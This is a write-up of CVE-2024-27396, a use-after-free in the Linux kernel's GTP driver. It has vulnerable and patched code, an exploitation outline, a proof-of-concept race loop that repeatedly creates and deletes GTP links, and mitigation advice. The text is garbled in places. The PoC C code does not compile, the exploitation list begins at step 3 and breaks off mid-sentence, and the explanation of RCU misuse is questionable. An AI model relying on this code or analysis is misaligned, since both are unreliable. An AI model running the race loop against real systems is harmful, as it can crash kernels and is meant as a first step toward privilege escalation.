CVE-2024-27396 - Use-After-Free Vulnerability in Linux Kernel’s GTP Module – Details and Exploit Walkthrough

---

Overview

CVE-2024-27396 is a recently disclosed vulnerability affecting the Linux kernel’s GTP (GPRS Tunneling Protocol) implementation. The flaw is a Use-After-Free (UAF) bug in the gtp_dellink function, which can be triggered due to improper usage of RCU (Read-Copy-Update) mechanisms during the deletion of network links. This bug could allow a local attacker to cause a system crash or even potentially execute arbitrary code within the kernel context.

This write-up dives deeply into the bug, explains its cause, how it can be exploited, and how the official patch fixes the issue.

Where's the problem?

The problematic code lives in the GTP networking driver (net/gtp.c in the kernel). This driver implements support for the GPRS Tunneling Protocol, mainly used in mobile networking infrastructure.

When processing link deletion, the kernel iterates over a hash list of GTP tunnels using hlist_for_each_entry_rcu, but it also calls call_rcu() during that traversal. However, call_rcu() isn't allowed outside an RCU read special section—as a result, there is a risk that by the time the traversal continues, the memory being accessed is already freed.

Vulnerable snippet

// Vulnerable: net/gtp.c (simplified)
hlist_for_each_entry_rcu(t, &gtp->tid_hash[tid_hash], hlist_tid) {
    if (condition) {
        hlist_del_rcu(&t->hlist_tid);
        call_rcu(&t->rcu, gtp_tunnel_destroy);
    }
    // Use-after-free risk right here!
}

What goes wrong

When call_rcu() schedules t for deletion, but the code continues traversing the list using that same pointer, t could already be freed (by another CPU or operation finishing the RCU grace period). Accessing its members after that is a Use-After-Free error, opening the door to undefined behavior and exploitation.

Patch and Mitigation

The fix is to use hlist_for_each_entry_safe, which safely handles traversal and potential deletion at the same time.

Fixed Code

// Patched: net/gtp.c (simplified)
hlist_for_each_entry_safe(t, tmp, &gtp->tid_hash[tid_hash], hlist_tid) {
    if (condition) {
        hlist_del_rcu(&t->hlist_tid);
        call_rcu(&t->rcu, gtp_tunnel_destroy);
    }
    // Now 't' and 'tmp' are handled safely!
}

Commit reference

- Official patch: net: gtp: Fix Use-After-Free in gtp_dellink

How could it be exploited?

A malicious local user (with CAP_NET_ADMIN, or potentially via container escape with GTP networking privileges) can:

Delete tunnels rapidly, racing the deletion with other network activity.

3. Trigger UAF: By carefully controlling kernel objects’ allocation timing, userland code could attempt to induce a Use-After-Free, possibly leading to:

Proof of Concept (for research/demo purposes only)

// WARNING: For education ONLY. Do NOT run this on production machines.

#include <linux/netlink.h>
#include <linux/genetlink.h>
#include <sys/socket.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>

// This PoC would create and remove GTP tunnels rapidly using netlink
// For real exploitation, heap spraying and memory layout tricks are needed.

void *create_delete_tunnels(void *arg) {
    for (int i = ; i < 10000; i++) {
        system("ip link add gtp type gtp");
        system("ip link del gtp");
    }
    return NULL;
}

int main() {
    pthread_t th1, th2;
    pthread_create(&th1, NULL, create_delete_tunnels, NULL);
    pthread_create(&th2, NULL, create_delete_tunnels, NULL);
    pthread_join(th1, NULL);
    pthread_join(th2, NULL);
    return ;
}

With enough attempts and proper heap manipulation (advanced exploitation), this bug could be used as a springboard for privilege escalation.

Mitigation and Recommendations

- Upgrade kernel: Any kernel before the patch should be updated immediately if GTP is enabled or potentially usable by untrusted users.
- Restrict GTP module usage: Only trusted admin users should be allowed to create or remove GTP tunnels.
- Apply standard security hardening: Use kernel hardening features (e.g., CONFIG_SLUB_DEBUG, CONFIG_KASAN, and containers’ seccomp/apparmor/SELinux).

References

- Kernel.org Patch: net: gtp: Fix Use-After-Free in gtp_dellink
- CVE Details for CVE-2024-27396 (pending)
- Linux GTP Documentation

Summary Table

| Category | Details |
|---------------------|------------------------------------------|
| CVE | CVE-2024-27396 |
| Component | Linux Kernel (GTP net module) |
| Type | Use-After-Free (UAF) |
| Affected Versions | Pre-patch, depending on backport status |
| Impact | Kernel crash, potential RCE/priv escalation|
| Fix Released? | Yes (early 2024) |
| Easy to exploit?| Moderately, with local privileges |
| Exploit code? | Proof-of-concept available above |

Conclusion

CVE-2024-27396 demonstrates how subtle errors in kernel synchronization can lead to severe vulnerabilities, especially in networking subsystems exposed to untrusted users or containers. If your systems use GTP or allow untrusted users any access to kernel network configuration, patch ASAP.

For further details, keep an eye on the Linux netdev mailing list and official security advisories.

Timeline

Published on: 05/14/2024 15:12:27 UTC
Last modified on: 01/14/2025 14:26:09 UTC